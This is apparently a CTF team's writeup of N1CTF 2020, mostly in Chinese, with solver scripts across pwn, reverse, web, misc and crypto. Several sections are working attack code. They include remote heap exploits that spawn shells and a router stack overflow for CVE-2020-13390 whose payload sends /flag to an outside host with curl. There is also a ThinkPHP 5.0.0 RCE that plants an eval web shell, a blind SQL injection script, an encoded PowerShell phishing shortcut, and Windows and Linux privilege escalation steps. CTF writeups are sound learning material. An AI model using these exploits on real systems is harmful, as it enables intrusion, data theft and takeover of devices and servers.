N1CTF 2020 Writeup
PWN
Signin
漏洞点在于vector的delete后没有清空指针,只是-8,并且没有校验边界,导致了可以一直执行delete操作导致越界。
from pwn import *
#context.log_level ='DEBUG'
def menu(choice):
r.sendlineafter('>>',str(choice))
def add(idx,num):
menu(1)
r.sendlineafter('dex',str(idx))
r.sendlineafter('ber',str(num))
def free(idx):
menu(2)
r.sendlineafter('dex',str(idx))
def show(idx):
menu(3)
r.sendlineafter('dex',str(idx))
def gd(cmd=''):
gdb.attach(r,cmd)
pause()
libc=ELF('./libc.so')
#r=process('./signin')
r=remote('47.242.161.199',9990)
for i in range(0x120):
add(1,1)
print 'stage 1'
for i in range(0xea+1+0x139-3):
free(1)
print 'stage 2'
show(1)
r.recvuntil(':')
leak=int(r.recvline(),10)
print hex(leak)
lbase=leak-96-0x10-libc.symbols['__malloc_hook']
print hex(lbase)
print 'stage 3 start'
for i in range(0x24d4):
free(1)
print hex(i)
print 'stage 3 end'
add(1,lbase+libc.symbols['__free_hook']-8)
add(2,0x68732F6E69622F)
#gd('b system')
add(2,lbase+libc.symbols['system'])
add(2,lbase+libc.symbols['system'])
r.interactive()escape
https://github.com/Mem2019/Mem2019.github.io/blob/master/codes/N1-escape.html
babyrouter
CVE-2020-13390 entrys mitInterface 跟 page参数使用sprintf导致了栈溢出。 有00截断,但是调试的时候发现栈似乎不怎么变,所以直接硬编码栈地址试了下远程,直接成了
import requests
from pwn import *
cmd = ';curl -F flag=@/flag vps.exp.sh:1313;'
rop = ''
rop += p32(0xf6fff9ec)
rop += cmd
rop += 'A'*(240-len(cmd) - 4) #padding - len(cmd) - len(0xf6fff9ec)
rop += p32(0xf6fff9ec) # r4
rop += p32(0xf6fff9ec + 16) # r11
rop += p32(0x6B154) # pc
# .text:0006B154 LDR R0, [R11,#-16]
# .text:0006B158 LDR R1, [R11,#-20]
# .text:0006B15C MOV R2, #0x1000
# .text:0006B160 BL doShell
data = {
'entrys':'swings',
'mitInterface':'swings',
'page':rop
}
cookie = {'Cookie':'password=swingss'}
# r = requests.post('http://127.0.0.1:2333/goform/addressNat',data = data,cookies=cookie)
r = requests.post('http://8.210.119.59:9990/goform/addressNat',data = data,cookies=cookie)
easywrite
from pwn import *
r = remote("124.156.183.246","20000")
libc = ELF("./libc-2.31.so")
context.arch = libc.arch
r.recvuntil("Here is your gift:")
libc.address =int( r.recvline()[:-1],16)-0x8ec50
def pack_file(_flags = 0,
_IO_read_ptr = 0,
_IO_read_end = 0,
_IO_read_base = 0,
_IO_write_base = 0,
_IO_write_ptr = 0,
_IO_write_end = 0,
_IO_buf_base = 0,
_IO_buf_end = 0,
_IO_save_base = 0,
_IO_backup_base = 0,
_IO_save_end = 0,
_IO_marker = 0,
_IO_chain = 0,
_fileno = 0,
_lock = 0,
_wide_data = 0,
_mode = 0):
file_struct = p32(_flags) + \
p32(0) + \
p64(_IO_read_ptr) + \
p64(_IO_read_end) + \
p64(_IO_read_base) + \
p64(_IO_write_base) + \
p64(_IO_write_ptr) + \
p64(_IO_write_end) + \
p64(_IO_buf_base) + \
p64(_IO_buf_end) + \
p64(_IO_save_base) + \
p64(_IO_backup_base) + \
p64(_IO_save_end) + \
p64(_IO_marker) + \
p64(_IO_chain) + \
p32(_fileno)
file_struct = file_struct.ljust(0x88, "\x00")
file_struct += p64(_lock)
file_struct = file_struct.ljust(0xa0, "\x00")
file_struct += p64(_wide_data)
file_struct = file_struct.ljust(0xc0, '\x00')
file_struct += p64(_mode)
file_struct = file_struct.ljust(0xd8, "\x00")
return file_struct
def payload_IO_file_finish(libc,_IO_str_jumps_addr, system_addr, binsh_addr):
payload = pack_file(_flags = 0,
_IO_read_ptr = 0x61,
_IO_read_base = libc.sym['_IO_list_all']-0x10,
_IO_write_base = 0,
_IO_write_ptr = 1,
_IO_buf_base = binsh_addr,
_mode = 0x7fffffff,
_wide_data = 0x1eb880+libc,
)
payload += p64(_IO_str_jumps_addr-8)
payload += p64(0)
payload += p64(system_addr)
return payload
message = p32(0xdeadbeef)*(0x30-12)+p64(libc.sym['__free_hook']-0x8)*10
where = flat(libc.address+0x1f34f0)
r.sendafter("message",message)
r.sendafter("write?",where)
r.sendafter("Any last message?","/bin/sh\x00"+p64(libc.sym['system']))
r.interactive()W2L
权限没配好, 非预期解了
mv bin bin1
/bin1/mkdir bin
/bin1/chmod 777 bin
/bin1/echo "/bin1/cat /root/flag" > /bin/umount
/bin1/chmod 777 /bin/umount
exitRe
Oflo
签到题,子进程执行cat,父进程ptrace上去,获取结果作为key,然后异或
s = list(b"Linux version 4.19.104-microsoft-standard (")[0:14]
res = [53, 45, 17, 26, 73, 125, 17, 20, 43, 59, 62, 61, 60, 95]
for i in range(14):
res[i] ^= s[i] + 2
print(b"n1ctf" + bytes(res))Oh My Julia
x64dbg调试,输入时下断点,跟出来到Julia编译后的地方,分析出算法。 flag分为5部分校验,用_分割 校验分别为直接对比,异或,中国剩余定理,简单位运算加密,快速幂。
from z3 import *
from struct import pack
from functools import reduce
import copy
import math
def egcd(a, b):
"""扩展欧几里得"""
if 0 == b:
return 1, 0, a
x, y, q = egcd(b, a % b)
x, y = y, (x - a // b * y)
return x, y, q
def chinese_remainder(pairs):
"""中国剩余定理"""
mod_list, remainder_list = [p[0] for p in pairs], [p[1] for p in pairs]
mod_product = reduce(lambda x, y: x * y, mod_list)
mi_list = [mod_product//x for x in mod_list]
mi_inverse = [egcd(mi_list[i], mod_list[i])[0] for i in range(len(mi_list))]
x = 0
for i in range(len(remainder_list)):
x += mi_list[i] * mi_inverse[i] * remainder_list[i]
x %= mod_product
return x
def rol(a, b):
return (a << b | a >> (8-b)) & 0xff
a = b"n0w"
b = bytes(list(map(lambda x: x ^ 0xB1, [0xE8, 0xDE, 0xC4])))
c = chinese_remainder([(0x1337, 0x8FF), (0x18d9, 0x105a), (0x245f, 0x1595)])
c = pack("<I", c)
s = Solver()
d = [BitVec("x%d"%i, 8) for i in range(5)]
k = copy.copy(d)
d[0] = rol(d[0], 2)
d[2] = rol(d[2], 3)
d[3] = d[2] ^ d[3] ^ d[0]
kk = (d[4] ^ d[1] ^ (d[0] << 3)) & 0xff
d[1] = ((kk >> 1) | ((d[4] ^ d[1]) << 7)) & 0xff
d[4] = rol(d[4], 4)
d[0] = (d[0] ^ d[4] ^ (kk << 2)) & 0xff
res = [0x59, 0xBE, 0x62, 0xFA, 0x04]
s.add(d[0] == res[0])
s.add(d[1] == res[1])
s.add(d[2] == res[2])
s.add(d[3] == res[3])
s.add(d[4] == res[4])
assert s.check() == sat
m = s.model()
d = b""
for i in k:
d += bytes([m[i].as_long()])
e = 6167994677750637846787284031284198699166724915292914207416625769922807110688701075146631681903787645131506509092609320621680335996011774133185924915744219183246974202510061588080450525756895523022680363592573974409387577754216307554444653180967764812466382206303916522606490290560284293010748494659520932252400522132701503847731262931700009254884130125557658811643798175788587564577224264756167863381391234404013004010044434222103569714559454690179319609962742145774093818530050466364779170297899996215415882749698196692126283911687170238829459195201541686347648768736129003321187960266022395285700138347393691701069800248507644296815948904642976231288390406392891137494265832494759401573097210850114663153274313756537534018109589206570602540559326039200848716638617367713171988711893402604262898551564788694015795986970388491176582531665735658490435481200684917725457390389445927207017739551104899293208031894691597567751372316173235969218701236129333475312126687483726518198884513431441373732322137387513411186113815489008204909882767211169670588119365268975311156035629164815032021033896627248205135889384062142533117427126174095664288229688983857514052912429373540989636730411614444500275895553786288524905672481290914962230663942978711977191617065355285376252300919856061262086308230629602563968135550187794697940223487471707339180184560459695301837543872635681488327980744438810932238175173336910108067161104524934145719389582851097368935750517077890034754480445239796065956023382953081104391321505492418879642843744083771488220776322694705558795406301099726143053265877629581376259736759379188070314677590380180875273589564613559077305039931521532889492874654116461687721433729560604345053665295353236076664587087994310194406827022786656499847672193385624034515585768388568701635965244814323298597210348083543194600191130177132309986678969373551829442002747485311866575378350703527238711102095369384336356910404004469356190806173157632587752829434386287114578291155464880709213641422876002393911662603315051364986980980896704848929494530865685081868837652490605249636514235057182207702952321657454456321540781618152251278528268041930821982417146538319344639262942409287413758365258936719585888245823584824787839695792942350835975325889291159555569773698908762648328204484224374476005032892196588715683423064219222095210187956084050428453531372674950072726211172825585275037410644186218960539109203196375294568056346977690840547747822508969530870855717294746523948068657810545614758240263248907656864643160983042403080961181298595656632900922716579858394871958904348170040153453056274611115019806506784108202367951401353592710709416624855402518608477578191464102129214837978994562796271286110818402775533844116138832972397140813091516932287622012692130454886149279432122660261892989759781348004545029997150326044796872548795315202824218021068605447949528282532753984199427360981380117727924707097097567755338759071037135582068677841242604984336821824912907298987321024269757948506834116030717378803260595543851757773593544092953717412777765946902006422552357788941850994131011985300156956761652763512117337592141362903770443640417077587868843401739463946011976427366277535691415538303315680898571953720879996801759034877085380157983224998649271609665774965177001138337677090025872131388597130451372531363
e = bin(int(math.log(e, 3)))
ee = e[2::][::-1]
e = b""
for i in ee:
if i == '1':
e += b"Z"
else:
e += b"z"
print(a + b"_" + b + b"_" + c + b"_" + d + b"_" + e)easy apk
ollvm,调试分析算法 替换表的base64+aes_cbc
tbl = list(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+-/")
res = b"jZe3yJG3zJLHywu4otmZzwy/"
a = b""
for i in range(0, len(res), 4):
t = list(map(lambda x: tbl.index(x), list(res[i:i+4])))
s = [0 for i in range(3)]
s[0] = ((t[0] & 0x3f) << 2) | ((t[1] >> 4) & 3)
s[1] = ((t[1] & 0xf) << 4) | ((t[2]>>2) & 0xf)
s[2] = (t[3] & 0x3f) | ((t[2] & 3) << 6)
a += bytes(s)
f1 = a[1:-1]
k2 = b"17b87f9aae8933ef"
k1 = b"'17b87f9aae8933efn1ctf{}"
cipher = b"'7890123456789012"
res = bytes([0xA5, 0xA4, 0x4C, 0x0D, 0xD2, 0x52, 0x1E, 0x63, 0x54, 0xC5, 0x29, 0xFA, 0xE4, 0xEC, 0x1F, 0x27, 0x52, 0xD2, 0xF1, 0xB7, 0xE4, 0x1C, 0x61, 0x42, 0x77, 0x9F, 0x5D, 0xA1, 0x87, 0x0A, 0xEC, 0x55])
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
aes = AES.new(k1, iv=k2[0:16], mode=AES.MODE_CBC)
cipher = pad(cipher, 16)
f2 = unpad(aes.decrypt(res), 16)[1:]
print(b"n1ctf{" + f1 + f2 + b"}")N1egg In Fixed Camera
彩蛋题,strings一下level0找到flag
easyre
虚拟机,用异常处理来控制路径,再就没啥了
import os
def swap_b(x):
return (x<<4)&0xf0 | (x>>4)&0xf
stack = [0x31,0x4e]
flag = [0x43 for i in range(0x64)]
flag[0] = ord('n')
flag[1] = ord('1')
flag[2] = ord('c')
flag[3] = ord('t')
flag[4] = ord('f')
flag[5] = ord('{')
# result_i
#['700', '500', '1056', '998', '1212', '1467', '1279', '1594', '1606', '2077', '2299', '2326', '2238', '2261', '2363', '2813', '2924', '2786', '2935', '3179', '3281', '3354', '3325', '3417', '3535', '3396', '3547', '3825', '3754', '4145', '4382', '4423', '4532', '4489', '4766', '4769', '4701', '4911', '5133', '5078', '5084', '5059', '5496', '5499', '5483', '5484', '6176', '6203', '6276', '6044', '6729', '6668', '6906', '6965', '6886', '7134', '']
fp = open("result_i",'rb')
result = fp.read()
fp.close()
result = result.split('\n')
print result
f = 1
# flag[6] = flag[6] ^ stack[0]
# stack[0] = flag[6]
summ = 0
for i in range(6):
summ += flag[i]
print summ
xchange_t = [0,0,0,0,0,0,0]
for i in range(100):
if i%2 == 0:
xchange_t.append(1)
xchange_t.append(1)
else:
xchange_t.append(0)
xchange_t.append(0)
i = 0
while True:
if i > len(result)-2:
break
#print result[i]
x = abs(int(result[i],10) - summ)
print x
if xchange_t[i+6] == 0:
flag[i+6] = x ^ stack[0]
stack[0] = x
else:
flag[i+6] = x ^ stack[1]
flag[i+6] = swap_b(flag[i+6])
stack[1] = x
summ += x
i += 1
print ''.join([chr(x) for x in flag])
# for i in range(6,0x40):
# print 'flag[' + hex(i)[2:] + ']:' + hex(flag[i])
# summ = 0
# for i in range(6):
# summ += flag[i]
# print summWeb
Signln
import requests
import string
import re
url = "http://101.32.205.189/?input=O%3A4%3A%22flag%22%3A2%3A%7Bs%3A2%3A%22ip%22%3Bs%3A9%3A%22callmecro%22%3Bs%3A5%3A%22check%22%3Bs%3A25%3A%22n1ctf20205bf75ab0a30dfc0c%22%3B%7D"
characters = string.printable[:-5]
r = requests.get(url)
if "n1ctf{" in r.text:
flag = "".join(re.findall(r'n1ctf{.*}',r.text))
exit(flag)
sql ="select `key` from n1key"
exp = "'||(select ip from n1ip where updatexml(1,concat('~',(select if(ascii(substring((%s),%d,1))=%d,'n1ctf','callmecro')),'~'),3))||'"
res = ""
for i in range(1,100):
flag = True
for char in characters:
payload = exp % (sql, i, ord(char))
#payload = exp
headers = {
"X-Forwarded-For":payload
}
r = requests.get(url,headers=headers)
if 'welcome to n1ctf2020<' in r.text:
res += char
print(res)
flag = False
break
if flag:
break
# key = n1ctf20205bf75ab0a30dfc0cThe king of phish(victim-bot)
创建类似这样的powershell的快捷方式
powershell -exec bypass -encodedCommand blahblah...然后手工更改lnk文件里面的0x20为0x09 直接发过去就上线了
The king of phish(UserA-PC)
上去一看whoami开了SeRestorePrivilege,思路就很明显了。 这是超级权限,允许修改任何文件和任何注册表。。。
用usodllloader,写个自己的WindowsCoreDeviceInfo.dll,CreateFile的时候带上FILE_FLAG_BACKUP_SEMANTICS,直接写入system32文件夹。
触发加载直接得到system的shell。
zabbix_fun
首先Admin zabbix登录。查看下agent的ip地址
之后配置host,使能zbx
再用监控项(item)读文件就行了
easy_tp5
发现tp版本是5.0.0,存在RCE的payload,但是由于open_basedir的设置和disabled_functions,导致了无法执行命令。
所以思路就是往web目录下面写一个自己的shell,这样就可以逃出这个漏洞的限制,找到了Build类的module方法
在其中的buildHello方法中,存在写文件的操作,通过构造payload即可往public下面写一个Index.php文件
但是因为我们只能调用一个参数的函数,并且这个参数必须要是字符串,所以我们要向上找一步,发现module方法完全符合我们的要求,所以利用这一点,我们就可以写一个shell:
因为pathinfo的原因,需要找到一个包含,而不能直接访问我们的文件,所以使用Loader类的__include_file来包含刚才写的文件,进而getshell
payload: 写文件:
_method=__construct&filter[]=think\Build::module&method=GET&get[]=index//../../public/?><?php eval($_REQUEST[1]);
包含文件_method=__construct&filter[]=think\__include_file&method=GET&get[]=/var/www/html/public/?><?php eval($_REQUEST[1]);/controller/Index.php
最后利用蚁剑连上去,一键bypass disable_function就可以了
misc
Signln
Welcome to N1CTF 2020.
n1ctf{welc0m3_to_n1ctf2020_ctfers}
AllSignIn
Crypto
vss
预测随机数 https://github.com/kmyk/mersenne-twister-predictor/blob/master/mt19937predictor.py
from PIL import Image
import qrcode
import random
from mt19937predictor import MT19937Predictor
im = Image.open("share2.png")
m,n = im.size
m //= 2
n //= 2
f = []
for idx in range(n*m):
i, j = idx//n, idx % n
a1=im.getpixel((2*j,2*i))
a2=im.getpixel((2*j,2*i+1))
a3=im.getpixel((2*j+1,2*i))
a4=im.getpixel((2*j+1,2*i+1))
assert a1==a2 and a3==a4
c = a1 & 1
# pixel ^ flip == c
f.append(c)
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=12,
border=4,
)
for l in range(50):
FLAG='n1ctf{'+''.join(random.choice('abcdef-_1234567890') for _ in range(l))+'}'
qr.add_data(FLAG)
qr.make(fit=True)
img = qr.make_image(fill_color="black", back_color="white")
if img.size[0] == 444 and img.size[1] == 444:
img.save('test.png')
break
l = 624*32
#l = len(data) & (~0b11111)
data = [x&1 for x in list(img.getdata())[-l:]]
flip = [x^y for x,y in zip(data,f[-l:])]
r = ''.join(chr(x+48) for x in flip)
r = int(r, 2)
pred = MT19937Predictor()
pred.setrandbits(r, l)
bits = pred.getrandbits(444*444-l)
bits = bin(bits)[2:].rjust(444*444-l, '0')
flip = [int(x) for x in bits] + flip
im = Image.new("L", (m,n))
data = [(x ^ y)*255 for x, y in zip(f, flip)]
im.putdata(data)
im.save('qr.png')curve
看上去像是 ECDH 的 DDH 问题, 但是实际上 smart attack 直接求 dlp 就行了. 一次 2 秒, 30 次 90 秒以内没问题.
# generate curve
p = 0
m = 2^256
while p not in Primes():
p = 11*m*(m + 1) + 3
m += 1
E=EllipticCurve(GF(p), j=-2^15)
if E.order() != p:
E=E.quadratic_twist()
# attack
for i in range(30):
s = io.recvline()
l = s.decode().split("(")
g0 = E(eval("("+l[-3].replace(":",",")))
g1 = E(eval("("+l[-2].replace(":",",")))
c01 = E(eval("("+l[-1].replace(":",",")))
k = SmartAttack(P,g1,p)
if k*g0 == c01:
io.sendline("0")
else:
io.sendline("1")注: 因为是 jupyter 所以懒得一个个 block 去 copy, 也懒得导出代码再排版, 就贴一下关键代码, 下同
FlagBot
注意到 secret 被公用, 可求其模不同 order 的阶再 CRT. 这里只选择小于 2^40 的阶:
# factor order
for i in range(7):
o = gens[i].order()
k = 1
kk = list(factor(o/k))[-1][0]
while kk > 2^40:
k *= kk
kk = list(factor(o/k))[-1][0]
rgens.append(k*gens[i])
rpubs.append(k*pubs[i])
rorder.append(rgens[i].order())
# dlp
o = 1
for i in range(7):
o = lcm(o,rorder[i])
print(factor(rorder[i]))
rsecret.append(rgens[i].discrete_log(rpubs[i]))
print(o)
print(o > 2^255)
# crt
secret = rsecret[0]
o = rorder[0]
for i in range(1,7):
secret = crt(secret,rsecret[i],o,rorder[i])
o = lcm(o,rorder[i])
print(secret)BabyProof
没看懂跟 ZKP 有啥关系, 但是一看就是类似于 DSA 的 LLL. 大概先估算一下需要 60 组数据比较稳妥 ( $247 > 256*n/(n+1) - log(n)/2$ ). 但是因为速度太慢就只要了 44 组数据.
M = Matrix(ZZ, m+2,m+2)
for i in range(m):
M[i,i] = qs[i]
M[-2,i] = cs[i]
M[-1,i] = rs[i]
M[-1,-1] = 2^246
M[-2,-2] = 1